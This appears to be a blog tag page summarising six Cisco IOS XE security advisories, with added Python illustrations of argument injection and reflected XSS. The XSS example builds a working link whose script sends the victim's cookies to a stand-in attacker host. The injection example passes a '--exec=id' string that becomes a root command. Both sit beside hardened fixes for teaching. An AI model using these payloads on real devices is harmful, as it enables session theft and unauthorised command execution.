Posts for: #16.11.1

Cisco IOS XE Software Web Authentication Reflected Cross-Site Scripting Vulnerability

🚨 SEVERITY: MEDIUM — CVSS 6.1 Security Advisory

TL;DR 📌

A reflected cross-site scripting (XSS) vulnerability has been identified in the Web Authentication feature of Cisco IOS XE Software. An unauthenticated, remote attacker could use it to run arbitrary script code in the browser of a user who opens a crafted link to the affected device's web authentication interface. Cisco has released software updates that address this vulnerability; there are no workarounds.

What happened 🕵️‍♂️

A vulnerability in the Web Authentication feature of Cisco IOS XE Software allows an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of that interface. The vulnerability exists because user-supplied input is not properly sanitized before it is reflected back into the page. An attacker could exploit it by persuading a user to click a crafted link; the injected script then runs in that user's browser in the context of the affected interface and could be used to steal the user's cookies for the device.


Cisco IOS XE Software for Catalyst 9000 Series Switches Denial of Service Vulnerability

🚨 SEVERITY: HIGH — CVSS 7.4 Security Advisory

TL;DR 📌

A denial of service vulnerability has been identified in Cisco IOS XE Software for Catalyst 9000 Series Switches. An unauthenticated, adjacent attacker (one able to deliver Ethernet frames to the switch, i.e. on the same Layer 2 network) can exploit it by sending crafted Ethernet frames that cause an egress port to drop all outbound traffic. The highest CVSS score is 7.4 (High). Cisco has released fixed software; no workarounds are available.

What happened 🕵️‍♂️

A vulnerability in the handling of certain Ethernet frames in Cisco IOS XE Software for Catalyst 9000 Series Switches allows an unauthenticated, adjacent attacker to send crafted Ethernet frames that block an egress port, resulting in a denial of service (DoS) condition. Once exploited, the affected port drops all outbound traffic, severely impacting network operations.


Cisco IOS XE Software CLI Argument Injection Vulnerability

🚨 SEVERITY: MEDIUM — CVSS 6.0 Security Advisory

TL;DR 📌

A medium-severity vulnerability has been identified in Cisco IOS XE Software that allows an authenticated, local attacker with administrative privileges to execute arbitrary commands as root on the underlying operating system. No workarounds are available; users are advised to upgrade to fixed software as soon as possible.

What happened 🕵️‍♂️

A vulnerability in the command-line interface (CLI) of Cisco IOS XE Software could allow an authenticated, local attacker with administrative privileges to execute arbitrary commands as root on the underlying operating system of an affected device. The vulnerability is due to insufficient validation of user-supplied arguments to specific CLI commands. An attacker could exploit it by logging in with valid administrative credentials and passing crafted arguments to the affected commands. Note that the attacker must already hold administrative access to the IOS XE CLI; what the vulnerability adds is the ability to run arbitrary commands as root on the underlying Linux host, which the IOS XE command set is not meant to allow.
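As an added illustration of the bug class described above (this is constructed example code, not Cisco IOS XE code, and not the affected command, which the advisory does not name): a management CLI takes a file name from an administrator and hands it to a privileged OS-level tool. The `os_tool` function, its `--exec` option and the file-name allowlist are assumptions made for the demonstration; the tool is modelled with `argparse` so the effect is visible without running anything on the host.

```python
# Argument injection: constructed example, not Cisco IOS XE code.
# "os_tool" stands in for a privileged tool that a management CLI calls on
# behalf of an administrator; "--exec" is a hypothetical option of that tool.
import argparse
import re


def os_tool(argv):
    """Stand-in for the underlying OS tool. argv[0] is the program name.
    The hypothetical --exec option would run a command as the tool's own
    user (root, on a network OS), so it must never be attacker-reachable."""
    parser = argparse.ArgumentParser(prog=argv[0], add_help=False,
                                     exit_on_error=False)
    parser.add_argument("--exec", dest="exec_cmd", default=None)
    parser.add_argument("files", nargs="*")
    return parser.parse_args(argv[1:])


def build_argv_vulnerable(user_arg):
    """Insufficient validation: the administrator's string is passed straight
    through. Anything starting with '-' is parsed by os_tool as an option,
    not as a file name, so '--exec=<cmd>' becomes a root command."""
    return ["os-tool", user_arg]


# Allowlist for file names: must start with an alphanumeric character, so a
# value can never begin with '-' (an option) or '.' (path tricks).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def build_argv_hardened(user_arg):
    """Validate the argument against an allowlist, then terminate option
    parsing with '--' so that even a value that somehow slips through is
    treated as a positional argument rather than an option."""
    if not SAFE_NAME.fullmatch(user_arg):
        raise ValueError("invalid file name: %r" % user_arg)
    return ["os-tool", "--", user_arg]


if __name__ == "__main__":
    # Attacker-controlled argument typed at the management CLI.
    evil = "--exec=id"
    print("vulnerable:", os_tool(build_argv_vulnerable(evil)))
    print("hardened, benign name:", os_tool(build_argv_hardened("backup.cfg")))
    try:
        build_argv_hardened(evil)
    except ValueError as e:
        print("hardened, rejected:", e)
    # Defense in depth: '--' alone already neutralises a leading dash.
    print("after '--':", os_tool(["os-tool", "--", evil]))
```

The two layers are deliberate: the allowlist is the real fix (it also blocks characters that matter to a shell if the tool is ever invoked through one), and the `--` separator limits the damage if a later change to the allowlist is too permissive.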


Cisco IOS XE Software Network-Based Application Recognition Denial of Service Vulnerability

🚨 SEVERITY: HIGH — CVSS 8.6 Security Advisory

TL;DR 📌

A high-severity vulnerability has been identified in the Network-Based Application Recognition (NBAR) feature of Cisco IOS XE Software. This flaw could allow unauthenticated remote attackers to cause affected devices to reload, resulting in a denial of service (DoS) condition. Cisco has released fixed software, but there are no workarounds available.

What happened 🕵️‍♂️

A vulnerability in the NBAR feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of malformed Control and Provisioning of Wireless Access Points (CAPWAP) packets. An attacker could exploit it by sending such malformed CAPWAP packets to an affected device.


Cisco IOS XE Software Web UI Reflected Cross-Site Scripting Vulnerability

🚨 SEVERITY: MEDIUM — CVSS 6.1 Security Advisory

TL;DR 📌

A reflected cross-site scripting (XSS) vulnerability has been identified in the web UI of Cisco IOS XE Software. An unauthenticated, remote attacker could use it to run arbitrary script code in the browser of a user who opens a crafted link to the affected device's web UI. Cisco has released software updates that address this issue; no workarounds are available.

What happened 🕵️‍♂️

A vulnerability in the web UI of Cisco IOS XE Software allows an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because user-supplied input is not properly sanitized before it is reflected back into the page. An attacker could exploit it by persuading a user to click a crafted link; a successful exploit lets the injected script run in the user's browser in the context of the web UI and could be used to steal the user's cookies for the affected device.
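Both reflected XSS advisories on this page (the Web Authentication one above and the web UI one here) describe the same mechanism: a request parameter is echoed into the page without encoding, and a crafted link delivers the payload. The following is an added illustration of that mechanism, not Cisco IOS XE code: the login page template, the `error` query parameter, and the hostnames `switch.example.net` and `attacker.example` are assumptions made for the example.

```python
# Reflected XSS on a device login page: constructed example, not Cisco code.
# The "error" parameter and the page template are assumptions for this demo.
import html
from urllib.parse import parse_qs, urlencode, urlsplit


def _page(msg):
    # A minimal captive-portal style login form that shows a status message
    # taken from the request.
    return ("<html><body><form method='post' action='/login'>"
            "<p class='error'>" + msg + "</p>"
            "<input name='username'>"
            "<input name='password' type='password'>"
            "<input type='submit' value='Log in'>"
            "</form></body></html>")


def error_param(query_string):
    """First value of the 'error' query parameter, or '' if it is absent."""
    return parse_qs(query_string).get("error", [""])[0]


def render_vulnerable(query_string):
    """Improper sanitization: the parameter is reflected exactly as received,
    so any markup in it becomes part of the page."""
    return _page(error_param(query_string))


def render_hardened(query_string):
    """HTML-encode the reflected value. quote=True also encodes ' and ",
    which matters when a reflected value lands inside an attribute."""
    return _page(html.escape(error_param(query_string), quote=True))


def malicious_link(base="https://switch.example.net/login.html",
                   collector="https://attacker.example/c"):
    """The link an attacker would send to a user of the device's web interface
    (hypothetical hostnames). The script runs in the victim's browser in the
    origin of that interface, so document.cookie holds the device's cookies,
    which the payload ships to the attacker's collector."""
    payload = ("<script>new Image().src='" + collector +
               "/?c='+encodeURIComponent(document.cookie)</script>")
    return base + "?" + urlencode({"error": payload})


def attack_query():
    """Query string portion of the malicious link, as the device would see it."""
    return urlsplit(malicious_link()).query


def reflects_script(query_string, renderer):
    """True if a <script> tag from the query string survives into the page."""
    return "<script>" in renderer(query_string)


if __name__ == "__main__":
    qs = attack_query()
    print("vulnerable reflects script:", reflects_script(qs, render_vulnerable))
    print("hardened reflects script:  ", reflects_script(qs, render_hardened))
```

Output encoding at the point of reflection is the actual fix, which is why the advisories offer no workaround: it has to happen in the device software. Marking the session cookie `HttpOnly` would keep `document.cookie` out of reach of this particular payload, but it does not stop the script from performing actions in the victim's session, so it is a mitigation, not a substitute for the update.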


Cisco IOS XE Software for Catalyst 9800 Series Wireless Controller for Cloud Unauthenticated Access to Certificate Enrollment Service Vulnerability

🚨 SEVERITY: MEDIUM — CVSS 5.3 Security Advisory

TL;DR 📌

A medium-severity vulnerability has been identified in Cisco IOS XE Software for Catalyst 9800 Series Wireless Controllers for Cloud. This flaw allows an unauthenticated, remote attacker to reach the public-key infrastructure (PKI) server on an affected device and potentially enroll an unauthorized device. Workarounds are available, and Cisco has released software updates that fully address the issue.

What happened 🕵️‍♂️

A vulnerability in the Day One setup process of Cisco IOS XE Software for Catalyst 9800 Series Wireless Controllers for Cloud could allow an unauthenticated, remote attacker to access the PKI server running on an affected device. The vulnerability is due to incomplete cleanup after the Day One setup process, which leaves the PKI server reachable. An attacker could exploit it by sending Simple Certificate Enrollment Protocol (SCEP) requests to the device, potentially obtaining a certificate and joining an attacker-controlled device to the virtual wireless controller.
